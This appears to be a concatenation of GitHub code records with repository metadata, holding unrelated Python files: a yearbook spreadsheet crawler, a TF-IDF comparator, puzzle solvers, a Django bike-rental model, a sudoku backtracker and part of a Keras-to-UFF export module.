topic_list:\n if topic.text == '统计图' or topic.text == '附录':\n continue\n topic_str = ''.join(topic.text.split('、')[-1].split())\n try:\n file_list = topic.find_parent().find_next_sibling('ul',attrs = {'id':'foldinglist'}).find_all('li')\n except:\n file_list = topic.find_next_sibling('ul',attrs = {'id':'foldinglist'}).find_all('li')\n tongming_num = 1\n previous_file_name = ''\n for file in file_list:\n if 'xls' in file.a.get('href') or 'xlrx' in file.a.get('href'):\n file_json = {}\n file_json['topic'] = topic_str\n file_json['info'] = {}\n\n click_name = file.text\n if len(click_name.split())>1:\n raw_file_name = click_name.split()[0]\n cur_file_name = ' '.join(click_name.split()[1:])\n else:\n raw_file_name = click_name.split()[0]\n cur_file_name = click_name.split()[-1]\n\n if '续表' in cur_file_name:\n cur_file_name = previous_file_name +'_'+ cur_file_name.replace('续表','')\n elif previous_file_name == cur_file_name:\n cur_file_name = cur_file_name + '_' + str(tongming_num)\n tongming_num += 1\n else:\n previous_file_name = cur_file_name\n tongming_num = 1\n cur_file_name = str(year)+ '_' + cur_file_name\n cur_time = time.time()\n click_button = driver.find_element_by_xpath(\"//*[text()='{}']\".format(click_name))\n click_button.click()\n latestDownloadedFileName = getDonwLoadFileName(download_dir, raw_file_name, cur_time)\n\n if latestDownloadedFileName == 'quit':\n continue\n\n path = osp.join(download_dir, latestDownloadedFileName)\n\n if osp.exists(path):\n pass\n else:\n info_log.logger('不��在这个文件:'+path)\n continue\n # raise ValueError('这文件都不存在啊')\n\n pre_name, format_name = latestDownloadedFileName.split('.')\n # new_name = cur_file_name + '.' + format_name\n newpath = osp.join(download_dir, cur_file_name + '.' + format_name)\n # try:\n time.sleep(1)\n if osp.exists(newpath):\n info_log.logger.info('已经保存过这个文件了,不保存了哦!')\n continue\n os.rename(path, newpath)\n if osp.exists(newpath) and not osp.exists(path):\n info_log.logger.info('已保存:'+newpath)\n else:\n error_log.logger.error('!!!!!!!!!!!!!!!!!没找到:'+ newpath)\n error_time = 0\n while(True):\n time.sleep(1)\n error_time +=1\n if not osp.exists(path):\n break\n if error_time >=50:\n error_log.logger.error('真的rename不到文件诶')\n continue\n\n\n # time.sleep(5)\n # os.rename(path, newpath)\n # raise ValueError('这文件都不存在啊')\n # except:\n # time.sleep(2)\n # os.rename(path, newpath)\n file_json['name'] = cur_file_name\n json_list.append(file_json)\n with open('../info/shanxi.json', \"w\", encoding='utf-8') as f:\n json.dump(json_list, f, ensure_ascii=False, indent=4)\n\n del cur_file_name\n\nif __name__ == '__main__':\n main()\n","repo_name":"Gyhfresh/web-crawler-master","sub_path":"yearbook/shaanxi.py","file_name":"shaanxi.py","file_ext":"py","file_size_in_byte":8630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27440137180","text":"import pandas as pd\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom pipeline.comparators import BaseComparator\nimport faiss\n\n\nclass TFIDFComparator(BaseComparator):\n def compare(self, query_document, documents, num_results=10):\n # Combine title and text to create documents for TF-IDF\n documents_str = documents[\"title\"] + \" \" + documents[\"text\"]\n\n # Vectorize the documents using TF-IDF\n tfidf_vectorizer = TfidfVectorizer()\n tfidf_matrix = tfidf_vectorizer.fit_transform(documents_str)\n\n # Convert TF-IDF matrix to dense vectors for FAISS\n dense_tfidf_matrix = tfidf_matrix.toarray()\n\n # Build FAISS index\n index = faiss.IndexFlatL2(dense_tfidf_matrix.shape[1])\n index.add(dense_tfidf_matrix)\n\n # Transform and preprocess the query document\n query_tfidf_vector = tfidf_vectorizer.transform([query_document]).toarray()\n\n num_results = min(num_results, len(documents_str))\n\n # Perform similarity search using FAISS\n distances, indices = index.search(query_tfidf_vector, num_results)\n\n # Retrieve the most similar documents from your DataFrame based on indices\n return documents.iloc[indices[0]]\n\n\nif __name__ == '__main__':\n test_document = \"Coronavirus was first discovered in Wuhan, China in 2019.\"\n\n documents = pd.DataFrame(columns=[\"title\", \"text\"])\n documents.loc[0] = [\"Trump\", \"Trump is the former president of the United States\"]\n documents.loc[1] = [\"Coronavirus\", \"Coronavirus is a virus that causes COVID-19\"]\n documents.loc[2] = [\"Biden\", \"Biden is the current president of the United States\"]\n\n comparator = TFIDFComparator()\n print(comparator.compare(test_document, documents))\n","repo_name":"Weikang01/fake_news_detector","sub_path":"pipeline/comparators/tfidf_comparator.py","file_name":"tfidf_comparator.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70732506087","text":"#!/usr/bin/env python3\n\nimport sys\n\nFINAL_POSITION = 4086\nDECK_SIZE = 10007\n\nDEAL_INC=\"deal with increment \"\nNEW_STACK=\"deal into new stack\"\nCUT=\"cut \"\n\ndef parse(l):\n if l.startswith(DEAL_INC):\n return (deal, [int(l[len(DEAL_INC):])])\n elif l.startswith(NEW_STACK):\n return (new_stack, [])\n elif l.startswith(CUT):\n return (cut, [int(l[len(CUT):])])\n else:\n sys.stderr.write(\"Parse error ! {}\\n\".format(l))\n\ndef new_stack(params):\n a,b = params\n return (-a, -b - 1)\n\ndef cut(params, n):\n a,b = params\n return (a, b - n)\n\ndef deal(params, n):\n a,b = params\n return (n * a, n * b)\n\nwith open(\"day22_i.txt\") as f:\n shuffle = [parse(l) for l in f.readlines()]\n\nab = (1, 0)\nfor op, arg in shuffle:\n ab = op(ab, *arg)\n ab = (ab[0] % DECK_SIZE, ab[1] % DECK_SIZE)\n\nprint(\"Deck shuffler equation : {} * x + {} [{}]\".format(ab[0], ab[1], DECK_SIZE))\nprint(\"Position of card 2019 after shuffling a small deck : {}\".format(\n ((ab[0] * 2019 + ab[1]) % DECK_SIZE)))\n\n\nprint(\"Upping the ante\")\nDECK_SIZE=119315717514047\nSHUFFLE_COUNT=101741582076661\nFINAL_POS=2020\n\nprint(\"New deck size : {}\".format(DECK_SIZE))\nab = (1, 0)\nfor op, arg in shuffle:\n ab = op(ab, *arg)\n ab = (ab[0] % DECK_SIZE, ab[1] % DECK_SIZE)\n\nprint(\"1xDeck shuffler equation : {} * x + {} [{}]\".format(ab[0], ab[1], DECK_SIZE))\ninv = (pow(ab[0], -1, mod=DECK_SIZE), (-ab[1] % DECK_SIZE))\nprint(\"Inverse equation : - {} * {}\".format(inv[1], inv[0]))\n\nprint(\"Position of card 2019 after shuffling a big deck once : {}\".format(\n ((ab[0] * FINAL_POS + ab[1]) % DECK_SIZE)))\npos = (ab[0] * 2019 + ab[1]) % DECK_SIZE\nant = ((pos + inv[1]) * inv[0]) % DECK_SIZE\nprint(\"Trying to revert ? {}\".format(ant))\npos = (ab[0] * pos + ab[1]) % DECK_SIZE\nprint(\"Twice : {}\".format(pos))\nant = ((pos + inv[1]) * inv[0]) % DECK_SIZE\nant = ((ant + inv[1]) * inv[0]) % DECK_SIZE\nprint(\"Revert twice: {}\".format(ant))\n\ndef rev(pos, it, ab):\n r = (pow((1 - ab[0]), -1, DECK_SIZE) * ab[1]) % DECK_SIZE\n a_n = pow(ab[0], -it, mod=DECK_SIZE)\n inv = ((pos - r) * a_n + r) % DECK_SIZE\n return inv\n\nprint(\"Trying to generic revert twice ? {}\".format(rev(15965746545382, 2, ab)))\n\n# Finally\nprint(\"Trying to revert ? {}\".format(rev(2020, SHUFFLE_COUNT, ab)))\n","repo_name":"ey3ball/adventofcode2019","sub_path":"day22/day22_2.py","file_name":"day22_2.py","file_ext":"py","file_size_in_byte":2286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32133240297","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# https://www.hackerrank.com/challenges/max-array-sum\n\n# Using tabulation (bottom up approach) \n# Note that in the dp dictionary, we store the max sum for the subarray up till the length of the subarray. Hence, we simply return the last item in this dictionary to get the answer\n\ndef maxSubsetSum(arr):\n dp = {} # key : max index of subarray, value = sum\n dp[0], dp[1] = arr[0], max(arr[0], arr[1])\n for i, num in enumerate(arr[2:], start=2):\n dp[i] = max(dp[i-1], dp[i-2]+num, dp[i-2], num)\n return dp[len(arr)-1]\n \nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n n = int(input())\n\n arr = list(map(int, input().rstrip().split()))\n\n res = maxSubsetSum(arr)\n\n fptr.write(str(res) + '\\n')\n\n fptr.close()\n","repo_name":"Bidek56/HackerRank","sub_path":"Python/max-array-sum.py","file_name":"max-array-sum.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39874546510","text":"#!/usr/bin/python3\n\nimport yarp\nimport sys\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport pyqtgraph as pg\nimport pyqtgraph.opengl as gl\nfrom pyqtgraph.Qt import QtGui, QtCore\nimport numpy as np\nimport os\nimport pickle\n\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '../../../../ergonomic_assessment/src/')))\n\nimport AE\nimport tools\nfrom Skeleton import Skeleton\nfrom ErgoAssessment import ErgoAssessment\nfrom HumanPosture import HumanPosture\n\nclass RealTimePlotModule():\n\t\"\"\"\n\tThis module plots a bar chart with the probability distribution on the states.\n\tUsage\n\tpython plot_probabilities.py\n\tInput port: /processing/NamePort:o\n\t\"\"\"\n\tdef __init__(self):\n\t\tself.app = pg.mkQApp()\n\t\tpg.setConfigOption('background', 'w')\n\t\tpg.setConfigOption('foreground', 'k')\n\n\t\tself.view = pg.PlotWidget()\n\t\tself.view.resize(800, 600)\n\t\tself.view.setWindowTitle('Ergonomic score in latent space')\n\t\tself.view.setAspectLocked(True)\n\t\tself.view.show()\n\n\t\tself.port = yarp.BufferedPortBottle()\n\t\tself.port.open('/plot_latentspace')\n\n\t\tmetric = 'jointAngle'\n\t\tergo_name = ['TABLE_REBA_C']\n\n\t\tsize_latent = 2\n\t\tdx = 0.1\n\n\t\tloss = [[]]\n\t\tautoencoder = []\n\n\t\tall_score = []\n\t\tall_size = []\n\t\ttype_data = []\n\t\tpath_src = \"/home/amalaise/Documents/These/code/ergo_prediction/ergonomic_assessment/src/\"\n\t\tpath = path_src + \"save/AE/\" + metric + \"/\" + str(size_latent) + '/'\n\t\tlist_files = [f for f in os.listdir(path) if os.path.isfile(os.path.join(path, f))]\n\t\tlist_files.sort()\n\t\tfile = list_files[0]\n\n\t\twith open(path + file, 'rb') as input:\n\t\t\tautoencoder = pickle.load(input)\n\n\t\tinput_data = autoencoder.get_data_test()\n\t\tdata_output, encoded_data, score = autoencoder.test_model(input_data)\n\t\tscore = autoencoder.evaluate_model(input_data, data_output, metric)\n\t\t\n\t\tMax = np.max(encoded_data, axis = 0)\n\t\tMin = np.min(encoded_data, axis = 0)\n\t\tMean = np.mean(encoded_data, axis = 0)\n\n\t\t# Compute ergo score\n\t\tergo_assessment = ErgoAssessment(path_src + 'config/rula_config.json')\n\t\tlist_ergo_score = ergo_assessment.get_list_score_name()\n\t\tlist_ergo_score.sort()\n\n\t\treduce_posture = HumanPosture(path_src + 'config/mapping_joints.json')\n\t\tposture = Skeleton('dhm66_ISB_Xsens.urdf')\n\n\t\tself.X = np.arange(0.0, 1.0+dx, dx)\n\n\t\tself.ergo_grid = np.zeros((len(self.X), len(self.X)))\n\n\t\tfor i, data_x in enumerate(self.X):\n\t\t\tfor j, data_y in enumerate(self.X):\n\n\t\t\t\tx = np.zeros((1,size_latent))\n\t\t\t\tx[0, 0] = data_x\n\t\t\t\tx[0, 1] = data_y\n\n\t\t\t\tdecoded_data = autoencoder.decode_data(x)\n\t\t\t\tif metric == 'posture':\n\t\t\t\t\twhole_body = reduce_posture.reduce2complete(decoded_data[0])\n\t\t\t\t\tposture.update_posture(whole_body)\n\t\t\t\telse:\n\t\t\t\t\tposture.update_posture(decoded_data[0])\n\n\t\t\t\tergo_score = tools.compute_sequence_ergo(decoded_data[0], 0, ergo_name, path_src)[0]\n\t\t\t\tif ergo_score == 1:\n\t\t\t\t\tergo_score = 1\n\t\t\t\telif 1 < ergo_score < 5:\n\t\t\t\t\tergo_score = 2\n\t\t\t\telif 4 < ergo_score < 6:\n\t\t\t\t\tergo_score = 3\n\t\t\t\telse:\n\t\t\t\t\tergo_score = 4\n\n\t\t\t\tself.ergo_grid[j,i] = ergo_score\n\n\t\tself.flag = 0\n\n\t\tself.plot_latent_space()\n\n\n\tdef plot_latent_space(self, x=0, y=0):\n\t\tif self.flag:\n\t\t\tself.view.removeItem(self.scatter)\n\t\telse:\n\t\t\tself.flag = 1\n\n\t\tself.scatter = pg.ScatterPlotItem(pen=pg.mkPen(width=10, color='r'), symbol='o', size=1)\n\t\tplot_traj = pg.PlotItem(pen=pg.mkPen(width=5, color='r'), size=1)\n\n\t\timg_np = np.rot90(np.rot90(np.rot90(self.ergo_grid)))\n\t\t\n\t\timg = pg.ImageItem(img_np)\n\n\t\tself.scatter.setData(x=[x], y=[y])\n\t\tplot_traj.setData(x, y)\n\n\t\timg.setZValue(-100)\n\t\tself.view.addItem(img)\n\t\tself.view.addItem(self.scatter)\n\t\t\n\t\n\tdef update(self):\n\t\tb_in = self.port.read()\n\t\tdata = b_in.toString().split(' ')\n\n\t\tdel data[0]\n\n\t\tdata = list(map(float, data))\n\t\tdata = np.asarray(data)\n\n\t\tself.plot_latent_space(x=data[0]*len(self.X), y=len(self.X)-data[1]*len(self.X))\n\n\t\tQtGui.QApplication.processEvents()\n\n\t\treturn\n\n\tdef close(self):\n\t\tyarp.Network.disconnect(self.input_port, self.port.getName())\n\t\tself.port.close()\n\t\tsys.exit(self.app.exec_())\n\n\nif __name__==\"__main__\":\n\tyarp.Network.init()\n\trf = yarp.ResourceFinder()\n\trf.configure(sys.argv)\n\n\tfig = RealTimePlotModule()\n\n\twhile(True):\n\t\ttry:\n\t\t\tfig.update()\n\t\t\ti = 0\n\t\texcept KeyboardInterrupt:\n\t\t\tfig.close()\n\t\t\tbreak\n\n","repo_name":"inria-larsen/ergo_prediction","sub_path":"Modules/online_assessment/visualisation/src/plt_latent_space_online.py","file_name":"plt_latent_space_online.py","file_ext":"py","file_size_in_byte":4225,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"18548543930","text":"from Data_Structures.graph.graph import Graph, Vertex\n\ndef test_breadth_fisrt_graph():\n g = Graph()\n node1 = g.add_node('node1')\n node2 = g.add_node('node2')\n g.add_edge(node1,node2)\n assert g.breadth_first_search(node1) == ['node1','node2']\n\ndef test_breadth_first_graph():\n g = Graph()\n node1 = g.add_node('a')\n node2 = Vertex('s')\n assert g.breadth_first_search(node2) == \"Start node does not exist\"\n","repo_name":"mhn998/-data-structures-and-algorithms","sub_path":"python/tests/challenges/test_bfs_graph.py","file_name":"test_bfs_graph.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42498649585","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport cv2\n\ndef padding(img, h, w, h_, w_):\n h1 = int((h_-h)/2)\n h2 = int((h_-h)/2) + h\n w1 = int((w_-w)/2)\n w2 = int((w_-w)/2) + w\n img_pad = np.ones([h_,w_,3])*255\n img_pad[h1:h2, w1:w2, :] = img\n return img_pad\n\ndef resizeImage(img, h_, w_):\n h, w = img.shape[:2]\n if w < w_ and h < h_:\n img = padding(img, h, w, h_, w_)\n \n elif w >= w_ and h < h_:\n new_w = w_\n new_h = int(h*new_w/w)\n new_img = cv2.resize(img, (new_w, new_h), interpolation = cv2.INTER_AREA)\n img = padding(new_img, new_h, new_w, h_, w_)\n \n elif w < w_ and h >= h_:\n new_h = h_\n new_w = int(w*new_h/h)\n new_img = cv2.resize(img, (new_w, new_h), interpolation = cv2.INTER_AREA)\n img = padding(new_img, new_h, new_w, h_, w_)\n \n else:\n r = max(w/w_, h/h_)\n new_w = max(min(w_, int(w / r)), 1)\n new_h = max(min(h_, int(h / r)), 1)\n new_img = cv2.resize(img, (new_w, new_h), interpolation = cv2.INTER_AREA)\n img = padding(new_img, new_h, new_w, h_, w_)\n \n return img\n\ndef preprocess(path, h, w):\n img = cv2.imread(path)\n img = resizeImage(img, h, w)\n img = np.clip(img, 0, 255)\n img = np.uint8(img)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n img = img.astype(np.float32)\n img = img/255\n return img","repo_name":"TismeetSingh14/HTR_V1","sub_path":"Preprocessor.py","file_name":"Preprocessor.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1815907303","text":"import json\nimport os\nimport sys\nimport codecs\nimport random\n\nstdout_encoding = sys.stdout.encoding or sys.getfilesystemencoding()\n\nf = codecs.open(\"wordlist.json\", \"r\",'utf-8')\nf2 = codecs.open(\"wordlist2_clean.json\", \"r\",'utf-8')\nf3 = codecs.open(\"wordlist3_clean.json\", \"r\",'utf-8')\n\nwordlist = json.load(f)\nwordlist2 = json.load(f2)\nwordlist3 = json.load(f3)\n\nl = list(wordlist3.keys())\n\n# for i in l:\n# if i in wordlist or i in wordlist2:\n# del wordlist3[i]\n\nc1 = [\"#db5e5e\", \"#db7d5e\", \"#dba15e\", \"#dbb85e\", \"#dbd75e\", \"#9ddb5e\"]\nc2 = [\"#5edbd5\", \"#5ea3db\", \"#5e75db\", \"#2d6acc\", \"#2248f2\", \"#7222f2\"]\nc3 = [\"#db40de\", \"#de4094\", \"#9c2754\", \"#9c2744\", \"#c42f4f\", \"#c42f2f\"]\n\nfor i in wordlist:\n wordlist[i][\"seen\"] = 0\n wordlist[i][\"mastered\"] = 0\n wordlist[i][\"color\"] = random.choice(c1)\n\nfor i in wordlist2:\n wordlist2[i][\"seen\"] = 0\n wordlist2[i][\"mastered\"] = 0\n wordlist2[i][\"color\"] = random.choice(c2)\n\nfor i in wordlist3:\n wordlist3[i][\"seen\"] = 0\n wordlist3[i][\"mastered\"] = 0\n wordlist3[i][\"color\"] = random.choice(c3)\n\nprint(wordlist3)","repo_name":"keshav99/personalsite","sub_path":"german/flashcards/clean_jsons.py","file_name":"clean_jsons.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27199906692","text":"import uuid\n\nimport requests\nfrom django.conf import settings\nfrom django.contrib.gis.measure import D\nfrom django.db import models\nfrom django.db.utils import IntegrityError\nfrom django.dispatch import receiver\nfrom django.utils.timezone import now\nfrom preferences import preferences\n\nfrom cykel.models import CykelLogEntry\n\nfrom .bike import Bike\nfrom .lock_type import LockType\nfrom .station import Station\n\n\nclass Rent(models.Model):\n rent_start = models.DateTimeField()\n rent_end = models.DateTimeField(default=None, null=True, blank=True)\n start_location = models.ForeignKey(\n \"Location\",\n default=None,\n on_delete=models.PROTECT,\n null=True,\n blank=True,\n related_name=\"%(class)s_start_location\",\n )\n start_station = models.ForeignKey(\n \"Station\",\n default=None,\n on_delete=models.PROTECT,\n null=True,\n blank=True,\n related_name=\"%(class)s_start_station\",\n )\n end_location = models.ForeignKey(\n \"Location\",\n default=None,\n on_delete=models.PROTECT,\n null=True,\n blank=True,\n related_name=\"%(class)s_end_location\",\n )\n end_station = models.ForeignKey(\n \"Station\",\n default=None,\n on_delete=models.PROTECT,\n null=True,\n blank=True,\n related_name=\"%(class)s_end_station\",\n )\n bike = models.ForeignKey(\"Bike\", default=None, on_delete=models.PROTECT)\n user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.PROTECT)\n\n def __repr__(self):\n return \"\"\"Rent #{id}: Bike {bike} for User '{user}'\\n rented {rent_start}\n from {start_location}/{start_station}\\n return {rent_end}\n at {end_location}/{end_station}\"\"\".format(\n id=self.id,\n bike=self.bike,\n user=self.user,\n start_location=self.start_location,\n start_station=self.start_station,\n rent_start=self.rent_start,\n end_location=self.end_location,\n end_station=self.end_station,\n rent_end=self.rent_end,\n )\n\n def unlock(self):\n if self.bike.lock is None:\n return {}\n\n lock = self.bike.lock\n lock_type = lock.lock_type\n\n if lock_type is None:\n return {}\n\n if lock_type.form_factor == LockType.FormFactor.COMBINATION_LOCK:\n return {\"unlock_key\": self.bike.lock.unlock_key}\n\n if lock_type.form_factor == LockType.FormFactor.ELECTRONIC_LOCK:\n url = \"{url}/{device_id}/unlock\".format(\n url=lock_type.endpoint_url, device_id=lock.lock_id\n )\n r = requests.post(url)\n data = r.json()\n return {\"data\": data}\n\n return {}\n\n def end(self, end_location=None, force=False):\n self.rent_end = now()\n if end_location:\n self.end_location = end_location\n elif self.bike.public_geolocation():\n self.end_location = self.bike.public_geolocation()\n\n self.save()\n\n if self.end_location:\n # attach bike to station if location is closer than X meters\n # distance is configured in preferences\n max_distance = preferences.BikeSharePreferences.station_match_max_distance\n station_closer_than_Xm = Station.objects.filter(\n location__distance_lte=(self.end_location.geo, D(m=max_distance)),\n status=Station.Status.ACTIVE,\n ).first()\n if station_closer_than_Xm:\n self.bike.current_station = station_closer_than_Xm\n self.end_station = station_closer_than_Xm\n self.save()\n else:\n self.bike.current_station = None\n\n # set Bike status back to available\n self.bike.availability_status = Bike.Availability.AVAILABLE\n self.bike.save()\n try:\n # set new non static bike ID, so for GBFS observers can not track this bike\n self.bike.non_static_bike_uuid = uuid.uuid4()\n self.bike.save()\n except IntegrityError:\n # Congratulations! The 2^64 chance of uuid4 collision has happend.\n # here could be the place for the famous comment: \"should never happen\"\n # So we catch this error, but don't handle it,\n # because don't rotating a uuid every 18,446,744,073,709,551,615 rents is ok\n pass\n\n if self.bike.state == Bike.State.MISSING:\n data = {}\n if self.end_location:\n data = {\"location_id\": self.end_location.id}\n CykelLogEntry.objects.create(\n content_object=self.bike,\n action_type=\"cykel.bike.missing_reporting\",\n data=data,\n )\n\n if self.end_station:\n CykelLogEntry.objects.create(\n content_object=self.bike,\n action_type=\"cykel.bike.rent.finished.station\",\n data={\n \"rent_id\": self.id,\n \"trip_duration\": int(\n (self.rent_end - self.rent_start).total_seconds()\n ),\n \"station_id\": self.end_station.id,\n **({\"forced\": True} if force else {}),\n },\n )\n else:\n CykelLogEntry.objects.create(\n content_object=self.bike,\n action_type=\"cykel.bike.rent.finished.freefloat\",\n data={\n \"rent_id\": self.id,\n \"trip_duration\": int(\n (self.rent_end - self.rent_start).total_seconds()\n ),\n \"location_id\": getattr(self.end_location, \"id\", None),\n **({\"forced\": True} if force else {}),\n },\n )\n\n\n@receiver(models.signals.post_save, sender=Rent)\ndef rent_started(sender, instance, created, *args, **kwargs):\n # only interested in the first save\n if not created:\n return\n if instance.start_station:\n CykelLogEntry.objects.create(\n content_object=instance.bike,\n action_type=\"cykel.bike.rent.started.station\",\n data={\n \"rent_id\": instance.id,\n \"station_id\": instance.start_station.id,\n },\n )\n else:\n CykelLogEntry.objects.create(\n content_object=instance.bike,\n action_type=\"cykel.bike.rent.started.freefloat\",\n data={\n \"rent_id\": instance.id,\n \"location_id\": getattr(instance.start_location, \"id\", None),\n },\n )\n","repo_name":"transportkollektiv/cykel","sub_path":"bikesharing/models/rent.py","file_name":"rent.py","file_ext":"py","file_size_in_byte":6679,"program_lang":"python","lang":"en","doc_type":"code","stars":80,"dataset":"github-code","pt":"53"} +{"seq_id":"26988227943","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 26 11:54:26 2019\n\n@author: khushboogoyal\n\"\"\"\n\n\"\"\"this is the fucntion which check whether the board is full or not \nand return true and false, if it finds aleast one zero on the board\"\"\"\n\nimport time, os , psutil\ncount = 0\n\ndef BoradisFull(board):\n \n for x in range(0,9):\n for y in range(0,9):\n if board[x][y] == 0:\n \n return False\n \n\n print(\"board is filled\")\n \n return True\n\n \n print(\"board is yet to be solved\")\n \n\n\ndef possibleEntry(board , i, j):\n \n k=0\n l = 0\n \n \n \n \"\"\"this is the list to fill possible Array\"\"\"\n possibleArray = {}\n for x in range (1, 10):\n \n possibleArray[x] = 0\n #print('count is----',count) \n \n # for horizontal values\n for y in range (0, 9):\n \n if not board[i][y] == 0: \n \n possibleArray[board[i][y]] = 1\n \n # for vertical values\n \n for x in range (0, 9):\n if not board[x][j] == 0: \n possibleArray[board[x][j]] = 1\n \n #For squares\n\n # for i\n if i >= 0 and i <= 2:\n k = 0\n elif i >= 3 and i <= 5:\n k = 3\n else:\n k = 6\n \n # now for j\n if j >= 0 and j <= 2:\n l = 0\n elif j >= 3 and j <= 5:\n l = 3\n else:\n l = 6\n for x in range (k, k + 3):\n for y in range (l, l + 3):\n if not board[x][y] == 0:\n possibleArray[board[x][y]] = 1 \n \n for x in range (1, 10):\n if possibleArray[x] == 0:\n possibleArray[x] = x\n else:\n possibleArray[x] = 0\n \n return possibleArray\n\n\ndef printBoard(board):\n print(\"*********************\")\n for x in range(0, 9):\n if x == 3 or x == 6:\n print(\"*********************\")\n for y in range(0, 9):\n if y == 3 or y == 6:\n print(\"*\", end=\" \")\n print(board[x][y], end=\" \")\n print()\n print(\"*********************\")\n \n \ndef sudokuSolver(board):\n \n i = 0\n j = 0\n \n possiblity = {}\n global count; count += 1\n # function to check full board if in case and return board\n if BoradisFull(board):\n \n printBoard(board)\n print(\"Board Solved Successfully!\")\n \n return\n \n else:\n # check the first blank spot\n for x in range (0, 9):\n for y in range (0, 9):\n if board[x][y] == 0:\n # now i and j holds the value of x and y\n i = x\n j = y\n \n break\n else:\n continue\n break\n \n \n # get all the possibilities for i,j\n possiblity = possibleEntry(board, i, j)\n #print(possiblity)\n \n # go through all the possibilities and call the the function\n # again and again\n \n \n for x in range (1, 10):\n \n if not possiblity[x] == 0:\n board[i][j] = possiblity[x]\n \n #check again whole program\n sudokuSolver(board)\n\n \n \n \n # backtrack and it reset the particular step to 0\n board[i][j] = 0 \n \n \n \ndef main():\n \n start = time.time()\n grid=[[0 for x in range(9)]for y in range(9)] \n \n # assigning values to the grid \n #grid=[[0,0,0,0,0,9,0,0,5],\n # [0,0,9,1,0,0,0,0,7],\n # [8,0,0,0,0,3,0,0,4],\n # [9,6,0,0,0,1,8,0,0],\n # [0,0,0,0,0,0,0,0,0],\n # [0,0,2,6,0,0,0,5,1],\n #[3,0,0,9,0,0,0,0,2],\n #[1,0,0,0,0,2,3,0,0],\n #[7,0,0,4,0,0,0,0,0]]\n \n grid=[[4,0,0,0,0,5,0,0,0],\n [0,9,0,0,6,0,0,0,0],\n [6,0,0,0,2,0,4,8,0],\n [0,8,0,0,0,7,0,6,4],\n [0,5,9,0,0,0,8,3,0],\n [7,6,0,9,0,0,0,5,0],\n [0,7,5,0,4,0,0,0,8],\n [0,0,0,0,7,0,0,4,0],\n [0,0,0,1,0,0,0,0,2]]\n \n \n \n \n print(\"Board is yet to be filled\")\n printBoard(grid)\n sudokuSolver(grid)\n print('number of iterations',count)\n end = time.time()\n print(\"Time to run: {}\".format(end - start))\n \n \n \nif __name__ == \"__main__\":\n \n pid=os.getpid()\n \n ps= psutil.Process(pid)\n memoryUse = ps.memory_info()\n \n print(\"memory\", memoryUse.vms)\n main()\n\n\n\n\n\n","repo_name":"Khushgoyal/suduko_backtracking","sub_path":"backtracking_sudoku.py","file_name":"backtracking_sudoku.py","file_ext":"py","file_size_in_byte":4646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20610974961","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport logging\nimport os\nimport tempfile\n\nimport keras\nfrom nvidia_tao_tf1.core.export._quantized import (\n check_for_quantized_layers,\n process_quantized_layers,\n)\n\nfrom tensorflow.core.protobuf import saver_pb2\nfrom tensorflow.python.framework import graph_io\nfrom tensorflow.python.tools import freeze_graph\nfrom tensorflow.python.training import saver as saver_lib\nimport uff\nfrom uff.model.utils import convert_to_str\n\n\n\"\"\"Logger for UFF export APIs.\"\"\"\nlogger = logging.getLogger(__name__)\n\n\ndef _reload_model_for_inference(model, custom_objects=None):\n \"\"\"Reload a model specifically for doing inference.\n\n In order to export a model we need remove training-specific\n parts of the graph. For example, BatchNormalization layers\n may feature conditional branching to do training and inference\n alternately. This confused the UFF export tool.\n\n NOTE: the current Keras session is cleared in this function.\n Do not use this function during training.\n\n Args:\n model (Model): Keras model to reload in inference mode.\n custom_objects (dict): dictionary mapping names (strings) to custom\n classes or functions to be considered during deserialization for export.\n Returns:\n A model that can be used for inference only.\n \"\"\"\n # Save model to a temp file so we can reload it later.\n os_handle, tmp_model_file_name = tempfile.mkstemp(suffix=\".h5\")\n os.close(os_handle)\n model.save(tmp_model_file_name)\n\n # Make sure Keras session is clean and tuned for inference.\n keras.backend.clear_session()\n keras.backend.set_learning_phase(0)\n\n @classmethod\n def apply_fused_padding(cls, tf_node, inputs, tf_nodes):\n tf_padding = convert_to_str(tf_node.attr[\"padding\"].s)\n padding = None\n fields = {}\n if tf_padding == \"SAME\":\n fields[\"implicit_padding\"] = \"same\"\n elif tf_padding == \"VALID\":\n fields[\"implicit_padding\"] = None\n tf_lhs_node = tf_nodes[inputs[0]]\n if tf_lhs_node.op == \"Pad\":\n tf_padding_node = tf_nodes[tf_lhs_node.input[1]]\n p = cls.convert_tf2numpy_const_node(tf_padding_node)\n before, after = p[:, 0].tolist(), p[:, 1].tolist()\n if before == after:\n padding = before\n inputs[0] = tf_lhs_node.input[0]\n if tf_nodes[inputs[0]].op == \"Identity\":\n logger.info(\"Modulus patch identity layer in padding inputs.\")\n inputs[0] = tf_nodes[inputs[0]].input[0]\n else:\n raise ValueError(\"Padding mode %s not supported\" % tf_padding)\n return 